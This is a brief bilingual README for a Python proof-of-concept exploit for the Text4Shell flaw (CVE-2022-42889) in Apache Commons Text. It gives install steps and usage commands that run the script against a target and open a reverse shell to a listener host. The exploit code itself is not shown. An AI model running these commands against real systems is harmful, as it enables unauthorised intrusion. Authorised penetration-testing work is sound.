
Proof of Concept (PoC) for CVE-2022-42889 (Text4Shell) targeting Apache Commons Text versions prior to 1.10.0. This script automates Remote Code Execution (RCE) via script interpolation to establish a reverse shell. This version is a structured optimization based on the original exploit found at Exploit-DB (ID: 52261).
このスクリプトは、Apache Commons Text(バージョン < 1.10.0)に存在する CVE-2022-42889 脆弱性(別名 Text4Shell)を悪用するために設計されたペネトレーションテストツールです。リバースシェルを発動させる Java ベースのペイロードの配信を自動化します。
この実装は公開エクスプロイトに基づいています: https://www.exploit-db.com/exploits/52261
このスクリプトには Python 3 と requests ライブラリが必要です。
pip install requests
python3 exploit.py -t $IP -p $PORT -u <path> -param $PARAMETER -L $LHOST -P $LPORT
python3 exploit.py -t 10.10.10.10 -p 8080 -u /search/ -param query -L 10.10.14.5 -P 139
このツールは教育目的および許可されたペネトレーションテストのみを対象としています。作者は、このスクリプトの誤用またはそれによって生じた損害について一切の責任を負いません。